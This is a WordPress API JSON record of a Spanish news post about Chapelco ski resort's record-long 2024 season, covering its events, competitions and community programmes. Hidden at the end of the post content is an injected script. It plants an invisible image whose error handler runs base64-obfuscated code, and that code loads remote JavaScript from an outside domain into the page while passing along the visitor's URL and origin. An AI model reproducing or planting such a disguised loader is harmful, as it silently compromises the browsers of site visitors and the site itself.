{"id":8837,"date":"2024-10-18T10:42:52","date_gmt":"2024-10-18T13:42:52","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8837"},"modified":"2025-08-13T15:37:05","modified_gmt":"2025-08-13T18:37:05","slug":"chapelco-finalizo-con-exito-la-temporada-mas-larga-de-la-historia","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8837","title":{"rendered":"Chapelco finaliz\u00f3 con \u00e9xito la temporada m\u00e1s larga de la historia"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-f92f5271b67b4945b86d1a575b571222\" style=\"background-color:#7e7f7f\"><em>Chapelco culmin\u00f3 la temporada m\u00e1s larga de su historia. La abundante nieve que se renov\u00f3 semana a semana en durante 2024, no fue la \u00fanica gran protagonista. Las diferentes \u00e1reas del centro de esqu\u00ed m\u00e1s importante de la provincia de Neuqu\u00e9n ofrecieron nuevos servicios y propuestas en sus pistas y paradores, as\u00ed como eventos deportivos y de entretenimiento que hicieron vivir al visitante experiencias exclusivas, convirtiendo al invierno 2024 en uno de los m\u00e1s destacados de su historia.<\/em><\/h4>\n\n\n\n<p>Las nevadas llegaron muy temprano, lo que permiti\u00f3 iniciar la temporada antes de lo previsto, el s\u00e1bado 15 de junio. La preventa r\u00e9cord de servicios anunci\u00f3 una afluencia importante de esquiadores, y la promoci\u00f3n realizada en mercados nacionales e internacionales gener\u00f3 un escenario muy favorable desde el comienzo para todo el destino tur\u00edstico. Las mejores condiciones de nieve le permitieron a Chapelco extender la temporada hasta el domingo 13 de octubre, con beneficios y descuentos sin precedentes, que acercaron la posibilidad de esquiar en primavera a turistas de todas las procedencias.<\/p>\n\n\n\n<p>Tanto al comienzo como a final de temporada los residentes de Jun\u00edn y San Mart\u00edn de los Andes contaron con un d\u00eda libre de esqu\u00ed a elecci\u00f3n. El turismo proveniente de las provincias de Rio Negro y Neuquen disfrut\u00f3 de los dos Cursos para Residentes de Esqu\u00ed y Snowboard de una semana de duraci\u00f3n (en junio y septiembre) para aprender o mejorar su nivel de esqu\u00ed o snowboard con tarifas preferenciales.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/chapelco-primavera-extendida-20241001-_7R39141.jpg\"><img decoding=\"async\" width=\"1024\" height=\"719\" data-id=\"8838\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/chapelco-primavera-extendida-20241001-_7R39141-1024x719.jpg\" alt=\"\" class=\"wp-image-8838\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/chapelco-primavera-extendida-20241001-_7R39141-1024x719.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/chapelco-primavera-extendida-20241001-_7R39141-300x211.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/chapelco-primavera-extendida-20241001-_7R39141-768x539.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/chapelco-primavera-extendida-20241001-_7R39141-1536x1078.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/chapelco-primavera-extendida-20241001-_7R39141-100x70.jpg 100w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/chapelco-primavera-extendida-20241001-_7R39141-696x489.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/chapelco-primavera-extendida-20241001-_7R39141-1068x750.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/chapelco-primavera-extendida-20241001-_7R39141-598x420.jpg 598w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/chapelco-primavera-extendida-20241001-_7R39141-320x225.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/chapelco-primavera-extendida-20241001-_7R39141-480x337.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/chapelco-primavera-extendida-20241001-_7R39141-800x562.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/chapelco-primavera-extendida-20241001-_7R39141.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/Descuentos-del-20-30-y-hasta-50-en-los-servicios-20240926-_7R38530.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"8839\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/Descuentos-del-20-30-y-hasta-50-en-los-servicios-20240926-_7R38530-1024x683.jpg\" alt=\"\" class=\"wp-image-8839\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/Descuentos-del-20-30-y-hasta-50-en-los-servicios-20240926-_7R38530-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/Descuentos-del-20-30-y-hasta-50-en-los-servicios-20240926-_7R38530-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/Descuentos-del-20-30-y-hasta-50-en-los-servicios-20240926-_7R38530-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/Descuentos-del-20-30-y-hasta-50-en-los-servicios-20240926-_7R38530-1536x1025.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/Descuentos-del-20-30-y-hasta-50-en-los-servicios-20240926-_7R38530-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/Descuentos-del-20-30-y-hasta-50-en-los-servicios-20240926-_7R38530-1068x713.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/Descuentos-del-20-30-y-hasta-50-en-los-servicios-20240926-_7R38530-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/Descuentos-del-20-30-y-hasta-50-en-los-servicios-20240926-_7R38530-320x214.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/Descuentos-del-20-30-y-hasta-50-en-los-servicios-20240926-_7R38530-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/Descuentos-del-20-30-y-hasta-50-en-los-servicios-20240926-_7R38530-800x534.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/Descuentos-del-20-30-y-hasta-50-en-los-servicios-20240926-_7R38530.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/20240927-_7R38668.jpg\"><img decoding=\"async\" width=\"1024\" height=\"675\" data-id=\"8840\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/20240927-_7R38668-1024x675.jpg\" alt=\"\" class=\"wp-image-8840\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/20240927-_7R38668-1024x675.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/20240927-_7R38668-300x198.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/20240927-_7R38668-768x506.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/20240927-_7R38668-1536x1013.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/20240927-_7R38668-696x459.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/20240927-_7R38668-1068x704.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/20240927-_7R38668-637x420.jpg 637w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/20240927-_7R38668-320x211.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/20240927-_7R38668-480x317.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/20240927-_7R38668-800x528.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/20240927-_7R38668.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p><strong>Hitos de una temporada inolvidable<\/strong><br>Chapelco organiz\u00f3 el Primer Winter Camp para esquiadores y snowboarders con discapacidad de la mano del atleta paral\u00edmpico neuquino Enrique Plantey. Durante una semana los participantes con diferentes discapacidades tomaron clases con instructores especializados de Chapelco, cerrando la experiencia con una competencia en la pista 63.<\/p>\n\n\n\n<p>La Escuela de Esqu\u00ed adaptado de Chapelco realiz\u00f3 el 10\u00b0 Encuentro de Esqu\u00ed Adaptado Molly O\u00b4Brien del cual participaron personas con discapacidad representando a diferentes centros de esqu\u00ed del pa\u00eds.<\/p>\n\n\n\n<p>En las pistas homologadas de Chapelco, en 2024 se disputaron las competencias de la Federaci\u00f3n Internacional de Ski, como el Memorial Federico Graef y la Copa Sudamericana, con la participaci\u00f3n de esquiadores de distintas partes del mundo. Del mismo modo se realizaron las carreras de la Federaci\u00f3n Argentina de Ski y Andinismo, con la organizaci\u00f3n de la Asociaci\u00f3n Deportiva y Cultural L\u00e1car.<\/p>\n\n\n\n<p>Chapelco celebr\u00f3 la Fiesta del Monta\u00f1\u00e9s, con desfiles de las escuelas de esqu\u00ed, clubes locales, la participaci\u00f3n de instituciones, de los equipos de todas las \u00e1reas del centro de esqu\u00ed, y con demostraciones de las actividades alternativas que Chapelco ofrece en la nieve. El cierre cont\u00f3 la tradicional bajada de antorchas abierta a todo p\u00fablico y el encendido del ic\u00f3nico fog\u00f3n del monta\u00f1\u00e9s con la palabra CHAPELCO.<\/p>\n\n\n\n<p>Se corri\u00f3 el Memorial Quito Astete, en honor al recordado referente como persona y figura del esqu\u00ed en nuestro pa\u00eds, al haber sido Campe\u00f3n Nacional, miembro del equipo de demostradores de las escuelas de Argentina y de Austria, representante ol\u00edmpico en los JJ00 de Sarajevo (1982), Director de la Escuela de Esqu\u00ed Chapelco, entrenador y uno de los hijos del gran pionero de Chapelco Am\u00e9rico Astete.<\/p>\n\n\n\n<p>Una de las grandes experiencias que se vivi\u00f3 en Chapelco 2024 fue la posibilidad de participar de SUNSETS los d\u00edas jueves. Esta propuesta permiti\u00f3 a los visitantes esquiar en forma exclusiva durante una hora m\u00e1s, luego del cierre del cerro, en la pista El Palito, y posteriormente disfrutar de m\u00fasica de DJs en vivo junto a la gastronom\u00eda de Pablo Buzzo en el Refugio Graef. A su vez, los paradores Pantera Winter Point y Chapelco Truck, junto a La Choza realizaron los mejores \u00abafter\u00bb al terminar cada d\u00eda para cerrar la jornada de esqu\u00ed con buena m\u00fasica y tragos.<\/p>\n\n\n\n<p>Se realiz\u00f3 una nueva edici\u00f3n del Movistar Ski Day &amp; Night lo que brind\u00f3 la posibilidad a clientes Movistar de esquiar en forma exclusiva a primera hora de la ma\u00f1ana antes de la apertura del centro de esqu\u00ed y a \u00faltima hora de la tarde, para disfrutar de m\u00fasica mientras ca\u00eda la noche y luego descender por pista Pioneros con el bosque iluminado.<\/p>\n\n\n\n<p>Chapelco fue escenario de la Final del Campeonato Argentino de Freeride, clasificatorio para los Challengers del Freeride World Tour, del cual participaron los mejores referentes de esta disciplina en una espectacular jornada que se vivi\u00f3 en la Pista El Patrulla.<\/p>\n\n\n\n<p>La posibilidad de realizar vuelos en helic\u00f3ptero para todo p\u00fablico fue otro de los grandes atractivos del 2024, sumados a las actividades de Heli Snow Kite y Heli Ski para los esquiadores y snowboarders &nbsp;expertos. Se realizaron vuelos en parapente con instructor, disponibles para todos los esquiadores, una actividad que creci\u00f3 y suma cada vez m\u00e1s adeptos.<\/p>\n\n\n\n<p>Chapelco realiz\u00f3 Junto a la Municipalidad de San Mart\u00edn de los Andes la 20\u00b0 edici\u00f3n del Plan Aprendiendo en la Nieve, a trav\u00e9s del cual los ni\u00f1os de 7mo grado de las escuelas de San Mart\u00edn de los andes y la regi\u00f3n, aprendieron a esquiar de forma gratuita durante una semana, junto a sus profesores.<\/p>\n\n\n\n<p>Fue sede de entrenamiento de representantes de delegaciones internacionales para lo cual, a trav\u00e9s del Team Chapelco, se construy\u00f3 una pista de skicross y snowboard cross en Pradera del Puma, en la cual entrenaron los equipos de Italia, Alemania, Canad\u00e1, Rep\u00fablica Checa, Eslovenia y Espa\u00f1a con la presencia de sus campeones ol\u00edmpicos.<\/p>\n\n\n\n<p>Fernando Ruiz Diaz, vocalista de Catupecu Machu realiz\u00f3 un show ac\u00fastico en vivo en la base, abierto a todo p\u00fablico, donde tambi\u00e9n se present\u00f3 UVARG Tour con sus DJs Das Pharao, Paul Thomas y Anunnakis, WAISS con Ale Montero y Emi Allende, y el DJ Oliverio.<\/p>\n\n\n\n<p>Se corri\u00f3 la 37\u00b0 edici\u00f3n del Tetatl\u00f3n de Chapelco la carrera multidisciplinas m\u00e1s importante de la Argentina que involucra 4 disciplinas de deportes de monta\u00f1a. M\u00e1s de 400 competidores participan en esqu\u00ed, mountain bike, kayak y running por circuitos que incluyen el centro de esqu\u00ed, senderos del Parque Nacional Lan\u00edn, el Lago L\u00e1car, hasta llegar al centro c\u00edvico de San Mart\u00edn de los Andes. &nbsp;<\/p>\n\n\n\n<p>Se realiz\u00f3 la Copa Lacar de Freestyle en el Snowpark, una competencia de la Federaci\u00f3n Argentina de Ski y Andinismo FASA de la que participaron riders varones y mujeres en esqu\u00ed y snowboard, en modalidad Slopestyle.<\/p>\n\n\n\n<p>En Chapelco se dict\u00f3 el Curso de Capacitaci\u00f3n de Pistero Socorrista en primer grado. Durante un mes de trabajo intensivo, se instruyeron y titularon quienes ser\u00e1n los futuros patrulleros de la Argentina.<\/p>\n\n\n\n<p>La Asociaci\u00f3n Argentina de Instructores de Ski y Snowboard llev\u00f3 adelante la selecci\u00f3n del equipo de demostradores que representar\u00e1 a la Argentina en el pr\u00f3ximo Congreso Inter-Ski 2027 en Vail- USA, a trav\u00e9s de dos d\u00edas de preselecci\u00f3n y 5 d\u00edas de entrenamiento. En cuanto a la capacitaci\u00f3n de instructores, en Chapelco se dictaron los cursos de niveles 1 a 3 para la carrera de Instructorado Nacional de Esqu\u00ed y Snowboard. Asimismo, durante 2 d\u00edas de capacitaci\u00f3n y pruebas se realiz\u00f3 en Chapelco la rev\u00e1lida de t\u00edtulos de los formadores de instructores que tienen a cargo la capacitaci\u00f3n e instructores, en el pa\u00eds.<\/p>\n\n\n\n<p>Con el comienzo de la primavera Chapelco llev\u00f3 adelante una nueva edici\u00f3n de su campa\u00f1a \u00abJuntos Al Teta\u00bb por la detecci\u00f3n temprana del c\u00e1ncer de mama. En esta edici\u00f3n realiz\u00f3 la producci\u00f3n de un video que explica c\u00f3mo convirti\u00f3 al Cerro Teta en s\u00edmbolo de la lucha contra el c\u00e1ncer de mama: durante 7 a\u00f1os, en 14 ediciones todos los inviernos y veranos Chapelco realiz\u00f3 el \u00ablazo rosa humano\u00bb en su cumbre, a 1980m de altura, s\u00edmbolo de la lucha contra esta enfermedad. El objetivo siempre fue el mismo, dar a conocer este mensaje: que la detecci\u00f3n temprana salva vidas. Con esta campa\u00f1a, logra que el Cerro Teta m\u00e1s que una pista sea siempre un recordatorio para todas las mujeres de que, si todav\u00eda no se hicieron su chequeo anual, el momento ideal es hoy.&nbsp;<\/p>\n\n\n\n<p>Nieves del Chapelco S.A. cierra la temporada 2024 con la grata sensaci\u00f3n de haber cumplido, con creces, una gran tarea. Agradece a cada uno de sus visitantes,\u00a0 y a todos los equipos de las diferentes \u00e1reas del cerro que llevaron adelante la temporada de nieve 2024, una vez m\u00e1s, con pasi\u00f3n, dedicaci\u00f3n y responsabilidad.<\/p>\n\n\n\n<p><em><mark class=\"has-inline-color has-vivid-cyan-blue-color\"><strong>Marcela Ferreiro<\/strong>; <strong>Prensa Chapelco Ski Resort<\/strong><\/mark><\/em><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Chapelco culmin\u00f3 la temporada m\u00e1s larga de su historia. La abundante nieve que se renov\u00f3 semana a semana en durante 2024, no fue la \u00fanica gran protagonista. Las diferentes \u00e1reas del centro de esqu\u00ed m\u00e1s importante de la provincia de Neuqu\u00e9n ofrecieron nuevos servicios y propuestas en sus pistas y paradores, as\u00ed como eventos deportivos [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8839,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,21],"tags":[],"class_list":["post-8837","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina","category-patagonia"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8837","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8837"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8837\/revisions"}],"predecessor-version":[{"id":10060,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8837\/revisions\/10060"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8839"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8837"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8837"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8837"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}